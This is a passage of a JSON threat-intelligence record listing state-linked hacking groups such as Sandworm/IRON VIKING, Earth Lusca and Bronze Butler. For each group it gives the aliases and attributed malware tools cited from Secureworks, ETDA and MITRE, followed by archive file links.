			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775446573,
	"ts_updated_at": 1775792229,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.pdf",
		"text": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.txt",
		"img": "https://archive.orkl.eu/8d05480fff0d069e0a873a92eabc9761b83dd8fb.jpg"
	}
}